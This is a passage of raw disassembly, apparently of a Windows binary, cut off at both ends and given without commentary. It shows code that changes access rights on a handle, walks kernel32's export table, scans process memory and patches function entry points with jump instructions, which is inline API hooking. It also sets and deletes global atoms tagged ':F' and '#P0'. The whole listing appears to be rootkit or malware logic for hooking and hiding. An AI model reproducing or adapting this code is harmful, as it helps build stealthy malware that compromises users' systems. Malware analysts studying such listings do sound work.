[ebp+var_30], 0 and [ebp+var_2C], 0 mov [ebp+var_28], 1 mov [ebp+var_24], 1 lea eax, aCurrent_user ; "CURRENT_USER" mov [ebp+var_20], eax mov [ebp+var_50], 2 mov [ebp+var_4C], 1 and [ebp+var_48], 0 lea edi, [ebp+var_44] lea esi, [ebp+var_30] mov ecx, 5 rep movsd lea eax, [ebp+var_18] push eax push 60000h lea eax, [ebp+var_1C] push eax call ds:dword_408FE0 lea eax, [ebp+var_64] push eax push 0 lea eax, [ebp+var_5C] push eax push 0 push 0 push 4 push 6 push [ebp+var_1C] call sub_407D68 ; GetSecurityInfo lea eax, [ebp+var_60] push eax push [ebp+var_5C] lea eax, [ebp+var_50] push eax push 1 call sub_407D80 ; SetEntriesInAclA push 0 push [ebp+var_60] push 0 push 0 push 4 push 6 push [ebp+var_1C] call sub_407D74 ; SetSecurityInfo push [ebp+var_1C] call sub_407984 ; CloseHandle lea eax, [ebp+var_18] push eax push [ebp+var_50] lea eax, [ebp+var_1C] push eax call ds:dword_408FE0 mov eax, [ebp+var_1C] pop edi pop esi leave retn sub_401A00 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401AE9 proc near ; CODE XREF: sub_401EAF+1B0p var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 14h mov eax, [ebp+arg_4] mov [ebp+var_C], eax mov ecx, [ebp+arg_8] mov [ebp+var_4], ecx and [ebp+var_8], 0 xor edx, edx mov [ebp+var_10], edx mov [ebp+var_14], eax push 4 push 0 push 1 lea eax, [ebp+var_4] push eax lea eax, [ebp+var_14] push eax push [ebp+var_4] push 0 lea eax, [ebp+var_8] push eax push 0FFFFFFFFh push [ebp+arg_0] call ds:dword_409004 mov eax, [ebp+var_8] leave retn sub_401AE9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401B2E proc near ; CODE XREF: sub_401EAF+21Bp arg_0 = dword ptr 8 push ebp mov ebp, esp push [ebp+arg_0] push 0FFFFFFFFh call ds:dword_408FF0 pop ebp retn sub_401B2E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401B3E proc near ; CODE XREF: sub_401E23+7Fp var_C = dword ptr -0Ch var_8 = dword ptr -8 var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 0Ch push ebx push esi push edi mov esi, [ebp+arg_0] mov ebx, [ebp+arg_4] xor edi, edi loc_401B4F: ; CODE XREF: sub_401B3E+24Fj movzx eax, byte ptr [esi+edi] cmp eax, 0FFh jnz short loc_401B8E movzx eax, byte ptr [edi+esi+1] cmp eax, 0FFh jnz short loc_401B8E movzx eax, byte ptr [edi+esi+2] cmp eax, 0FFh jnz short loc_401B8E movzx eax, byte ptr [edi+esi+3] cmp eax, 0FFh jnz short loc_401B8E movzx eax, byte ptr [edi+esi+4] cmp eax, 0FFh jz loc_401D93 loc_401B8E: ; CODE XREF: sub_401B3E+1Aj ; sub_401B3E+26j ... mov eax, [ebp+arg_8] lea eax, [ebx+eax+5] mov dl, [esi+edi] mov [eax+edi], dl mov [ebp+var_1], 0 loc_401B9F: ; CODE XREF: sub_401B3E+126j movzx eax, [ebp+var_1] imul eax, 0Ch movzx eax, byte_41AF74[eax] movzx edx, byte ptr [esi+edi] cmp edx, eax jnz loc_401C4F mov edx, edi dec edx movzx edx, byte ptr [esi+edx] cmp edx, eax jnz loc_401C4F mov edx, edi sub edx, 2 movzx edx, byte ptr [esi+edx] cmp edx, eax jnz short loc_401C4F mov edx, edi sub edx, 3 movzx edx, byte ptr [esi+edx] cmp edx, eax jnz short loc_401C4F mov eax, edi sub eax, 4 movzx eax, byte ptr [esi+eax] cmp eax, 0E8h jnz short loc_401C4F movzx eax, [ebp+var_1] imul eax, 0Ch push off_41AF7C[eax] call sub_407978 ; GetModuleHandleA movzx edx, [ebp+var_1] imul edx, 0Ch push off_41AF78[edx] push eax call sub_407990 ; GetProcAddress mov [ebp+var_8], eax or eax, 0FFFFFFFFh mov edx, [ebp+arg_8] lea edx, [ebx+edx+5] add edx, edi sub edx, 4 sub eax, edx add eax, [ebp+var_8] sub eax, 4 mov [ebp+var_C], eax mov eax, [ebp+arg_8] lea eax, [ebx+eax+5] add eax, edi sub eax, 4 mov edx, [ebp+var_C] mov ds:1[eax], edx jmp short loc_401C69 ; --------------------------------------------------------------------------- loc_401C4F: ; CODE XREF: sub_401B3E+76j ; sub_401B3E+85j ... movzx eax, [ebp+var_1] imul eax, 0Ch cmp off_41AF78[eax], 0 jz short loc_401C69 add [ebp+var_1], 1 jmp loc_401B9F ; --------------------------------------------------------------------------- loc_401C69: ; CODE XREF: sub_401B3E+10Fj ; sub_401B3E+120j cmp byte ptr [esi+edi], 4 jnz short loc_401CC3 mov eax, edi dec eax cmp byte ptr [esi+eax], 4 jnz short loc_401CC3 mov eax, edi sub eax, 2 cmp byte ptr [esi+eax], 4 jnz short loc_401CC3 mov eax, edi sub eax, 3 cmp byte ptr [esi+eax], 4 jnz short loc_401CC3 mov eax, edi sub eax, 4 movzx eax, byte ptr [esi+eax] cmp al, 68h jz short loc_401CAD cmp eax, 0BEh jz short loc_401CAD mov eax, edi sub eax, 5 cmp byte ptr [esi+eax], 24h jnz short loc_401CC3 loc_401CAD: ; CODE XREF: sub_401B3E+15Bj ; sub_401B3E+162j mov eax, ebx add eax, [ebp+arg_8] lea edx, [eax+edi+5] sub edx, 4 add eax, 7 mov ds:1[edx], eax loc_401CC3: ; CODE XREF: sub_401B3E+12Fj ; sub_401B3E+138j ... cmp byte ptr [esi+edi], 2 jnz short loc_401D2E mov eax, edi dec eax cmp byte ptr [esi+eax], 2 jnz short loc_401D2E mov eax, edi sub eax, 2 cmp byte ptr [esi+eax], 2 jnz short loc_401D2E mov eax, edi sub eax, 3 cmp byte ptr [esi+eax], 2 jnz short loc_401D2E mov eax, edi sub eax, 4 movzx eax, byte ptr [esi+eax] cmp eax, 0E8h jz short loc_401CFF cmp eax, 0E9h jnz short loc_401D2E loc_401CFF: ; CODE XREF: sub_401B3E+1B8j or eax, 0FFFFFFFFh mov edx, [ebp+arg_8] lea edx, [ebx+edx+5] add edx, edi sub edx, 4 sub eax, edx add eax, ebx sub eax, 4 mov [ebp+var_8], eax mov eax, [ebp+arg_8] lea eax, [ebx+eax+5] add eax, edi sub eax, 4 mov edx, [ebp+var_8] mov ds:1[eax], edx loc_401D2E: ; CODE XREF: sub_401B3E+189j ; sub_401B3E+192j ... cmp byte ptr [esi+edi], 1 jnz short loc_401D86 mov eax, edi dec eax cmp byte ptr [esi+eax], 1 jnz short loc_401D86 mov eax, edi sub eax, 2 cmp byte ptr [esi+eax], 1 jnz short loc_401D86 mov eax, edi sub eax, 3 cmp byte ptr [esi+eax], 1 jnz short loc_401D86 mov eax, edi sub eax, 4 movzx eax, byte ptr [esi+eax] cmp al, 3Dh jz short loc_401D6E cmp eax, 0FEh jz short loc_401D6E cmp eax, 0FFh jnz short loc_401D86 loc_401D6E: ; CODE XREF: sub_401B3E+220j ; sub_401B3E+227j call sub_40793C ; GetCurrentProcessId mov edx, [ebp+arg_8] lea edx, [ebx+edx+5] add edx, edi sub edx, 4 mov ds:1[edx], eax loc_401D86: ; CODE XREF: sub_401B3E+1F4j ; sub_401B3E+1FDj ... inc edi cmp edi, 400h jb loc_401B4F loc_401D93: ; CODE XREF: sub_401B3E+4Aj pop edi pop esi pop ebx leave retn sub_401B3E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401D98 proc near ; CODE XREF: sub_401EAF+53Bp var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = byte ptr 10h push ebp mov ebp, esp sub esp, 0Ch push ebx push esi push edi mov esi, [ebp+arg_0] jmp short loc_401DC2 ; --------------------------------------------------------------------------- loc_401DA6: ; CODE XREF: sub_401D98+34j xor edi, edi jmp short loc_401DB1 ; --------------------------------------------------------------------------- loc_401DAA: ; CODE XREF: sub_401D98+1Fj cmp byte ptr [esi+edi], 0 jnz short loc_401DB9 inc edi loc_401DB1: ; CODE XREF: sub_401D98+10j cmp edi, 3E8h jbe short loc_401DAA loc_401DB9: ; CODE XREF: sub_401D98+16j cmp edi, 3E8h jnb short loc_401DD3 inc esi loc_401DC2: ; CODE XREF: sub_401D98+Cj mov eax, [ebp+arg_4] sub eax, 3E8h cmp esi, eax jbe short loc_401DA6 jmp loc_401EAA ; --------------------------------------------------------------------------- loc_401DD3: ; CODE XREF: sub_401D98+27j add esi, 0Ah movzx edx, [ebp+arg_8] shl edx, 2 mov edi, ds:dword_408220[edx] xor ebx, ebx loc_401DE6: ; CODE XREF: sub_401E23+30j mov eax, edi add eax, ebx push eax call sub_4015EC pop ecx movzx eax, byte ptr [edi+ebx] cmp eax, 0E8h jz short sub_401E23 cmp eax, 0E9h jz short sub_401E23 and [ebp+var_4], 0 jmp short loc_401E17 ; --------------------------------------------------------------------------- loc_401E09: ; CODE XREF: sub_401D98+87j mov eax, ebx add eax, [ebp+var_4] mov dl, [edi+eax] mov [esi+eax], dl inc [ebp+var_4] loc_401E17: ; CODE XREF: sub_401D98+6Fj mov eax, ds:dword_408004 cmp [ebp+var_4], eax jb short loc_401E09 jmp short loc_401E4A sub_401D98 endp ; =============== S U B R O U T I N E ======================================= sub_401E23 proc near ; CODE XREF: sub_401D98+62j ; sub_401D98+69j ; DATA XREF: ... mov al, [edi+ebx] mov [esi+ebx], al lea eax, [edi+ebx+1] mov eax, [eax] mov [ebp-8], eax mov edx, esi add edx, ebx sub eax, edx mov edx, edi add edx, ebx add eax, edx mov [ebp-0Ch], eax lea eax, [esi+ebx+1] mov edx, [ebp-0Ch] mov [eax], edx loc_401E4A: ; CODE XREF: sub_401D98+89j add ebx, ds:dword_408004 cmp ebx, 5 jb short loc_401DE6 or eax, 0FFFFFFFFh mov edx, esi add edx, ebx sub eax, edx mov edx, edi add edx, ebx add eax, edx sub eax, 4 mov [ebp-8], eax mov byte ptr [ebx+esi], 0E9h lea eax, [esi+ebx+1] mov edx, [ebp-8] mov [eax], edx or eax, 0FFFFFFFFh sub eax, edi lea edx, [esi+ebx+5] add eax, edx sub eax, 4 mov [ebp-8], eax mov byte ptr [edi], 0E9h mov ds:1[edi], eax push ebx push esi movzx edx, byte ptr [ebp+10h] shl edx, 4 push off_41ADB8[edx] call sub_401B3E add esp, 0Ch loc_401EAA: ; CODE XREF: sub_401D98+36j pop edi pop esi pop ebx leave retn sub_401E23 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401EAF proc near ; CODE XREF: sub_406344+2FCp var_255C = dword ptr -255Ch var_2180 = dword ptr -2180h var_217C = byte ptr -217Ch var_2174 = dword ptr -2174h var_2170 = dword ptr -2170h var_216C = dword ptr -216Ch var_2168 = dword ptr -2168h var_2164 = dword ptr -2164h var_2160 = dword ptr -2160h var_215C = dword ptr -215Ch var_2158 = dword ptr -2158h var_2054 = dword ptr -2054h var_2050 = dword ptr -2050h var_204C = dword ptr -204Ch var_2048 = dword ptr -2048h var_2044 = dword ptr -2044h var_203C = dword ptr -203Ch var_202C = dword ptr -202Ch var_2028 = dword ptr -2028h var_2024 = dword ptr -2024h var_201D = byte ptr -201Dh var_201C = dword ptr -201Ch var_2018 = dword ptr -2018h var_1014 = dword ptr -1014h var_100D = byte ptr -100Dh var_100C = dword ptr -100Ch var_1008 = dword ptr -1008h var_4 = dword ptr -4 arg_0 = byte ptr 8 push ebp mov ebp, esp mov eax, 255Ch call sub_4078CC push ebx push esi push edi call sub_4019A1 mov [ebp+var_201D], 0 call sub_4079C0 ; GetVersion cmp eax, 80000000h jnb short loc_401EDE mov [ebp+var_201D], 1 loc_401EDE: ; CODE XREF: sub_401EAF+26j mov [ebp+var_100D], 0 loc_401EE5: ; CODE XREF: sub_401EAF+EBj cmp [ebp+var_201D], 0 jnz short loc_401F02 movzx edx, [ebp+var_100D] shl edx, 4 cmp byte_41ADBC[edx], 1 jz short loc_401F1F loc_401F02: ; CODE XREF: sub_401EAF+3Dj cmp [ebp+var_201D], 0 jz short loc_401F21 movzx edx, [ebp+var_100D] shl edx, 4 cmp byte_41ADBC[edx], 2 jnz short loc_401F21 loc_401F1F: ; CODE XREF: sub_401EAF+51j jmp short loc_401F81 ; --------------------------------------------------------------------------- loc_401F21: ; CODE XREF: sub_401EAF+5Aj ; sub_401EAF+6Ej movzx edx, [ebp+var_100D] mov [ebp+var_2158], edx mov ecx, edx shl ecx, 4 push off_41ADB4[ecx] call sub_407A50 ; LoadLibraryA mov edx, [ebp+var_2158] mov ds:dword_408B40[edx*4], eax movzx edx, [ebp+var_100D] mov ecx, edx shl ecx, 4 push off_41ADB0[ecx] shl edx, 2 mov [ebp+var_215C], edx push ds:dword_408B40[edx] call sub_407990 ; GetProcAddress mov edx, [ebp+var_215C] mov ds:dword_408220[edx], eax loc_401F81: ; CODE XREF: sub_401EAF:loc_401F1Fj add [ebp+var_100D], 1 movzx edx, [ebp+var_100D] shl edx, 4 cmp off_41ADB0[edx], 0 jnz loc_401EE5 mov [ebp+var_100D], 0 loc_401FA7: ; CODE XREF: sub_401EAF+5A1j movzx edx, [ebp+var_100D] shl edx, 2 cmp ds:dword_408220[edx], 0 jz loc_402437 movzx edx, [ebp+var_100D] shl edx, 2 mov edx, ds:dword_408B40[edx] mov [ebp+var_202C], edx cmp [ebp+var_201D], 0 jz loc_402168 call sub_401A00 mov [ebp+var_2028], eax mov edx, [ebp+var_202C] mov ebx, edx shr ebx, 16h shl ebx, 16h mov eax, ebx add eax, 400000h mov [ebp+var_100C], eax xor edi, edi jmp short loc_40202E ; --------------------------------------------------------------------------- loc_40200D: ; CODE XREF: sub_401EAF+185j push 1000h push ebx call sub_407A38 ; IsBadReadPtr mov esi, eax xor esi, 1 shl esi, 2 mov [ebp+edi*4+var_1008], esi inc edi add ebx, 1000h loc_40202E: ; CODE XREF: sub_401EAF+15Cj cmp ebx, [ebp+var_100C] jbe short loc_40200D lea eax, [ebp+var_217C] push eax call sub_407A14 ; GlobalMemoryStatus and [ebp+var_1014], 0 jmp loc_4020DA ; --------------------------------------------------------------------------- loc_40204E: ; CODE XREF: sub_401EAF+23Cj push 0FFFFh push [ebp+var_1014] push [ebp+var_2028] call sub_401AE9 add esp, 0Ch mov [ebp+var_4], eax or eax, eax jz short loc_4020D0 and [ebp+var_2180], 0 loc_402075: ; CODE XREF: sub_401EAF+583j mov ebx, [ebp+var_2180] jmp short loc_4020BF ; --------------------------------------------------------------------------- loc_40207D: ; CODE XREF: sub_401EAF+216j xor edi, edi loc_40207F: ; CODE XREF: sub_401EAF+1F1j mov edx, ebx shr edx, 2 shl edx, 2 add edx, [ebp+var_4] mov esi, [edx+edi*4] and esi, 4 cmp esi, [ebp+edi*4+var_1008] jnz short loc_4020A2 inc edi cmp edi, 400h jb short loc_40207F loc_4020A2: ; CODE XREF: sub_401EAF+1E8j cmp edi, 3FFh jb short loc_4020B9 mov eax, ebx add eax, 1000h mov [ebp+var_2180], eax jmp short loc_402101 ; --------------------------------------------------------------------------- loc_4020B9: ; CODE XREF: sub_401EAF+1F9j add ebx, 1000h loc_4020BF: ; CODE XREF: sub_401EAF+1CCj cmp ebx, 0F000h jbe short loc_40207D push [ebp+var_4] call sub_401B2E pop ecx loc_4020D0: ; CODE XREF: sub_401EAF+1BDj add [ebp+var_1014], 10000h loc_4020DA: ; CODE XREF: sub_401EAF+19Aj mov eax, [ebp+var_2174] sub eax, 0FFFFh cmp [ebp+var_1014], eax jbe loc_40204E push [ebp+var_2028] call sub_407984 ; CloseHandle jmp loc_402437 ; --------------------------------------------------------------------------- loc_402101: ; CODE XREF: sub_401EAF+208j movzx edx, [ebp+var_100D] shl edx, 2 mov edx, ds:dword_408220[edx] mov [ebp+var_100C], edx and [ebp+var_100C], 0 loc_40211F: ; CODE XREF: sub_401EAF+2B7j mov edx, [ebp+var_100C] shl edx, 2 mov ecx, ebx shr ecx, 2 shl ecx, 2 add ecx, [ebp+var_4] mov ecx, [ecx+edx] mov [ebp+edx+var_2018], ecx mov edx, [ebp+var_100C] shl edx, 2 mov ecx, ebx shr ecx, 2 shl ecx, 2 add ecx, [ebp+var_4] add edx, ecx or byte ptr [edx], 2 inc [ebp+var_100C] cmp [ebp+var_100C], 400h jb short loc_40211F loc_402168: ; CODE XREF: sub_401EAF+12Ej cmp [ebp+var_201D], 0 jnz short loc_4021CC push offset aKernel32_dll ; "kernel32.dll" call sub_407978 ; GetModuleHandleA mov [ebp+var_2160], eax mov edx, eax add edx, ds:3Ch[eax] mov [ebp+var_2164], edx add edx, 78h add eax, [edx] mov [ebp+var_2168], eax mov eax, [ebp+var_2160] mov edx, [ebp+var_2168] add edx, 1Ch add eax, [edx] mov [ebp+var_216C], eax mov eax, [ebp+var_2160] mov edx, [ebp+var_216C] add eax, [edx] mov [ebp+var_2170], eax mov [ebp+var_2054], eax loc_4021CC: ; CODE XREF: sub_401EAF+2C0j push 1Ch lea eax, [ebp+var_2048] push eax call sub_407AB0 ; RtlZeroMemory mov eax, [ebp+var_202C] mov [ebp+var_2024], eax loc_4021E6: ; CODE XREF: sub_401EAF+372j ; sub_401EAF+39Aj push 1Ch lea eax, [ebp+var_2048] push eax push [ebp+var_2024] call sub_407B10 ; VirtualQuery mov eax, [ebp+var_202C] cmp [ebp+var_2044], eax jnz short loc_40224B mov eax, [ebp+var_203C] mov [ebp+var_204C], eax add [ebp+var_2024], eax cmp [ebp+var_201D], 0 jnz short loc_4021E6 push 20060000h push 0 mov edx, [ebp+var_204C] shr edx, 0Ch push edx mov edx, [ebp+var_2048] shr edx, 0Ch push edx push 1000Dh call [ebp+var_2054] jmp short loc_4021E6 ; --------------------------------------------------------------------------- loc_40224B: ; CODE XREF: sub_401EAF+357j movzx edx, [ebp+var_100D] shl edx, 2 mov ecx, [ebp+var_2024] sub ecx, [ebp+var_202C] mov ds:dword_408620[edx], ecx movzx edx, [ebp+var_100D] shl edx, 2 mov edx, ds:dword_408220[edx] mov [ebp+var_100C], edx push 1000h push edx call sub_407A44 ; IsBadWritePtr mov [ebp+var_2050], eax or eax, eax jnz loc_4023F2 cmp [ebp+arg_0], 0 jz loc_4023D6 mov eax, [ebp+var_100C] movzx eax, byte ptr [eax] cmp eax, 0E9h jz short loc_4022C1 cmp [ebp+arg_0], 1 jz loc_4023F2 jmp loc_4023D6 ; --------------------------------------------------------------------------- loc_4022C1: ; CODE XREF: sub_401EAF+401j mov eax, [ebp+var_100C] mov edx, ds:1[eax] sub edx, 0FFFFFFFFh lea eax, [edx+eax+4] mov [ebp+var_201C], eax mov byte ptr [ebp+var_2160+3], 0 loc_4022E2: ; CODE XREF: sub_401EAF+4A9j sub [ebp+var_201C], 5 mov esi, [ebp+var_201C] loc_4022EF: ; CODE XREF: sub_401EAF+471j mov eax, esi dec eax cmp byte ptr [eax], 0 jnz short loc_40231F mov eax, esi sub eax, 2 cmp byte ptr [eax], 0 jnz short loc_40231F mov eax, esi sub eax, 3 cmp byte ptr [eax], 0 jnz short loc_40231F mov eax, esi sub eax, 4 cmp byte ptr [eax], 0 jnz short loc_40231F mov eax, esi sub eax, 5 cmp byte ptr [eax], 0 jz short loc_402322 loc_40231F: ; CODE XREF: sub_401EAF+446j ; sub_401EAF+450j ... dec esi jmp short loc_4022EF ; --------------------------------------------------------------------------- loc_402322: ; CODE XREF: sub_401EAF+46Ej movzx edx, byte ptr [ebp+var_2160+3] shl edx, 2 mov [ebp+edx+var_255C], esi add byte ptr [ebp+var_2160+3], 1 movzx eax, byte ptr [esi] cmp eax, 0E9h jnz short loc_40235A mov eax, ds:1[esi] sub eax, 0FFFFFFFFh lea eax, [eax+esi+4] mov [ebp+var_201C], eax jmp short loc_4022E2 ; --------------------------------------------------------------------------- loc_40235A: ; CODE XREF: sub_401EAF+493j mov edi, esi jmp short loc_40236D ; --------------------------------------------------------------------------- loc_40235E: ; CODE XREF: sub_401EAF+4C4j mov eax, [ebp+var_100C] add eax, edi sub eax, esi mov dl, [edi] mov [eax], dl inc edi loc_40236D: ; CODE XREF: sub_401EAF+4ADj cmp edi, [ebp+var_201C] jb short loc_40235E loc_402375: ; CODE XREF: sub_401EAF+51Fj sub byte ptr [ebp+var_2160+3], 1 movzx edx, byte ptr [ebp+var_2160+3] shl edx, 2 mov edi, [ebp+edx+var_255C] loc_40238D: ; CODE XREF: sub_401EAF+514j mov byte ptr [edi], 0 cmp byte ptr ds:1[edi], 0 jnz short loc_4023C2 cmp byte ptr ds:2[edi], 0 jnz short loc_4023C2 cmp byte ptr ds:3[edi], 0 ; DATA XREF: sub_41E239+2Fo jnz short loc_4023C2 cmp byte ptr ds:4[edi], 0 jnz short loc_4023C2 cmp byte ptr ds:5[edi], 0 jz short loc_4023C5 loc_4023C2: ; CODE XREF: sub_401EAF+4E9j ; sub_401EAF+4F3j ... inc edi jmp short loc_40238D ; --------------------------------------------------------------------------- loc_4023C5: ; CODE XREF: sub_401EAF+511j movzx eax, byte ptr [ebp+var_2160+3] or eax, eax jg short loc_402375 cmp [ebp+arg_0], 1 jz short loc_4023F2 loc_4023D6: ; CODE XREF: sub_401EAF+3EDj ; sub_401EAF+40Dj movzx eax, [ebp+var_100D] push eax push [ebp+var_2024] push [ebp+var_202C] call sub_401D98 add esp, 0Ch loc_4023F2: ; CODE XREF: sub_401EAF+3E3j ; sub_401EAF+407j ... cmp [ebp+var_201D], 0 jz short loc_402437 and [ebp+var_100C], 0 loc_402402: ; CODE XREF: sub_401EAF+581j mov edx, [ebp+var_100C] shl edx, 2 mov ecx, ebx shr ecx, 2 shl ecx, 2 add ecx, [ebp+var_4] mov eax, [ebp+edx+var_2018] mov [ecx+edx], eax inc [ebp+var_100C] cmp [ebp+var_100C], 400h jb short loc_402402 jmp loc_402075 ; --------------------------------------------------------------------------- loc_402437: ; CODE XREF: sub_401EAF+10Aj ; sub_401EAF+24Dj ... add [ebp+var_100D], 1 movzx edx, [ebp+var_100D] shl edx, 4 cmp off_41ADB0[edx], 0 jnz loc_401FA7 pop edi pop esi pop ebx leave retn sub_401EAF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40245B proc near ; CODE XREF: sub_4024E0+13p ; sub_40251A+14p var_6 = word ptr -6 var_4 = word ptr -4 var_2 = word ptr -2 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push eax push ebx push esi push edi mov edi, [ebp+arg_0] mov esi, [ebp+arg_4] mov ecx, edi or eax, 0FFFFFFFFh loc_40246E: ; CODE XREF: sub_40245B+18j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_40246E mov ebx, eax mov [ebp+var_6], bx mov ax, [ebp+var_6] mov [ebp+var_2], ax jmp short loc_402499 ; --------------------------------------------------------------------------- loc_402485: ; CODE XREF: sub_40245B+44j movzx eax, [ebp+var_2] cmp byte ptr [edi+eax], 5Ch jnz short loc_402495 inc [ebp+var_2] jmp short loc_4024A1 ; --------------------------------------------------------------------------- loc_402495: ; CODE XREF: sub_40245B+32j dec [ebp+var_2] loc_402499: ; CODE XREF: sub_40245B+28j movzx eax, [ebp+var_2] or eax, eax jg short loc_402485 loc_4024A1: ; CODE XREF: sub_40245B+38j mov ax, [ebp+var_2] cmp ax, [ebp+var_6] jnb short loc_4024DB mov [ebp+var_4], 0 jmp short loc_4024C9 ; --------------------------------------------------------------------------- loc_4024B3: ; CODE XREF: sub_40245B+7Ej movzx eax, [ebp+var_4] movzx edx, [ebp+var_2] mov ecx, eax add ecx, edx mov dl, [edi+ecx] mov [esi+eax], dl inc [ebp+var_4] loc_4024C9: ; CODE XREF: sub_40245B+56j movzx eax, [ebp+var_4] movzx edx, [ebp+var_6] movzx ecx, [ebp+var_2] sub edx, ecx cmp eax, edx jle short loc_4024B3 loc_4024DB: ; CODE XREF: sub_40245B+4Ej pop edi pop esi pop ebx leave retn sub_40245B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4024E0 proc near ; CODE XREF: sub_402784+3Ap ; sub_40284A+19Dp ... var_104 = byte ptr -104h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 104h lea eax, [ebp+var_104] push eax push [ebp+arg_0] call sub_40245B push offset aF ; ":F" lea eax, [ebp+var_104] push eax call sub_407E64 add esp, 10h lea eax, [ebp+var_104] push eax call sub_4079F0 ; GlobalAddAtomA leave retn sub_4024E0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40251A proc near ; CODE XREF: sub_405AAC+146p ; sub_405AAC+1A9p ... var_106 = word ptr -106h var_104 = byte ptr -104h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 108h push edi lea eax, [ebp+var_104] push eax push [ebp+arg_0] call sub_40245B push offset aF ; ":F" lea eax, [ebp+var_104] push eax call sub_407E64 add esp, 10h loc_402547: ; CODE XREF: sub_40251A+59j lea eax, [ebp+var_104] push eax call sub_407A08 ; GlobalFindAtomA mov edi, eax mov [ebp+var_106], di cmp [ebp+var_106], 0 jz short loc_402575 movzx eax, [ebp+var_106] push eax call sub_4079FC ; GlobalDeleteAtom jmp short loc_402547 ; --------------------------------------------------------------------------- loc_402575: ; CODE XREF: sub_40251A+4Aj pop edi leave retn sub_40251A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402578 proc near ; CODE XREF: sub_402613+12p var_35 = byte ptr -35h var_3 = byte ptr -3 var_2 = byte ptr -2 var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi mov edi, [ebp+arg_4] push 2 lea eax, [ebp+var_35] push eax push [ebp+arg_0] call sub_407DB0 add esp, 0Ch lea ecx, [ebp+var_35] or eax, 0FFFFFFFFh loc_40259B: ; CODE XREF: sub_402578+28j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_40259B mov ebx, eax mov [ebp+var_2], bl mov [ebp+var_1], 0 jmp short loc_4025C3 ; --------------------------------------------------------------------------- loc_4025AD: ; CODE XREF: sub_402578+55j movzx eax, [ebp+var_1] movzx edx, [ebp+var_2] sub edx, eax dec edx mov al, [ebp+eax+var_35] mov [edi+edx], al add [ebp+var_1], 1 loc_4025C3: ; CODE XREF: sub_402578+33j movzx eax, [ebp+var_1] movzx edx, [ebp+var_2] cmp eax, edx jl short loc_4025AD movzx eax, [ebp+var_2] mov byte ptr [edi+eax], 0 mov [ebp+var_3], 0 jmp short loc_4025EF ; --------------------------------------------------------------------------- loc_4025DD: ; CODE XREF: sub_402578+88j push (offset aP0+4) push edi call sub_407E64 add esp, 8 add [ebp+var_3], 1 loc_4025EF: ; CODE XREF: sub_402578+63j movzx eax, [ebp+var_3] mov edx, 20h movzx ecx, [ebp+var_2] sub edx, ecx cmp eax, edx jl short loc_4025DD push [ebp+arg_8] push edi call sub_407E64 add esp, 8 pop edi pop esi pop ebx leave retn sub_402578 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402613 proc near ; CODE XREF: sub_406344+37Cp var_32 = byte ptr -32h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 34h push (offset aP0+2) lea eax, [ebp+var_32] push eax push [ebp+arg_0] call sub_402578 add esp, 0Ch lea eax, [ebp+var_32] push eax call sub_4079F0 ; GlobalAddAtomA leave retn sub_402613 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_402638 proc near ; CODE XREF: sub_406344+3D5p ; sub_406344+3E6p var_104 = byte ptr -104h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 104h push [ebp+arg_0] lea eax, [ebp+var_104] push eax call sub_407E40 push offset aP0 ; "#P0" lea eax, [ebp+var_104] push eax call sub_407E64 push [ebp+arg_4] lea eax, [ebp+var_104] push eax call sub_407E64 add esp, 18h lea eax, [ebp+var_104] push eax call sub_4079F0 ; GlobalAddAtomA leave retn sub_402638 endp ; --------------------------------------------------------------------------- push ebp mov ebp, esp sub esp, 108h push edi push dword ptr [ebp+8] lea eax, [ebp-104h] push eax call sub_407E40 push offset aP0 ; "#P0" lea eax, [ebp-104h] push eax call sub_407E64 push dword ptr [ebp+0Ch] lea eax, [ebp-104h] push eax call sub_407E64 add esp, 18h loc_4026BD: ; CODE XREF: .text:004026E9j lea eax, [ebp-104h] push eax call sub_407A08 ; GlobalFindAtomA mov edi, eax mov [ebp-106h], di cmp word ptr [ebp-106h], 0 jz short loc_4026EB movzx eax, word ptr [ebp-106h] push eax call sub_4079FC ; GlobalDeleteAtom jmp short loc_4026BD ; --------------------------------------------------------------------------- loc_4026EB: ; CODE XREF: .text:004026DAj pop edi leave retn ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4026EE proc near ; CODE XREF: sub_402784+11p ; sub_40284A+F6p ... var_1008 = dword ptr -1008h var_1003 = byte ptr -1003h var_1000 = byte ptr -1000h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 1008h call sub_4078CC push edi mov edi, [ebp+arg_0] push 0FFFh lea eax, [ebp+var_1003] push eax call sub_40799C ; GetSystemDirectoryA mov [ebp+var_1000], 0 push 0FFFh lea eax, [ebp+var_1003] push eax lea eax, [ebp+var_4] push eax lea eax, [ebp+var_4] push eax lea eax, [ebp+var_1008] push eax push 0FFFh lea eax, [ebp+var_1003] push eax lea eax, 